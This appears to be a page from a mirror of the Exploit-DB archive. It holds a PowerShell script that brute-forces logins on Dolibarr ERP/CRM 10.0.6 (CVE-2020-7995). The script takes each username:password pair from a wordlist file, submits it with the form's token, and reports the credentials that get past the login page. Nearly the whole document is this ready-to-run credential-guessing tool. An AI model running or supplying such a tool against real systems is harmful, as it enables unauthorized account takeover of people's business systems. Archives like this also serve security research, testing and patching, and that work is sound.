bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50140.ps1
Offensive Security c385c8068c DB: 2021-07-20 
6 changes to exploits/shellcodes

WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
Dolibarr ERP/CRM 10.0.6 - Login Brute Force
PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
2021-07-20 05:01:52 +00:00

68 lines
No EOL
2.4 KiB
PowerShell
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995
function brute($url,$username,$passwd){
try{
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
Write-Warning "Something Wrong!"
}
}
function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
if($bf -eq $True){
break
}
}
}catch{
Write-Warning "File is error"
}
}
$textart=@'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/
'@
Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url
Reference in a new issue View git blame Copy permalink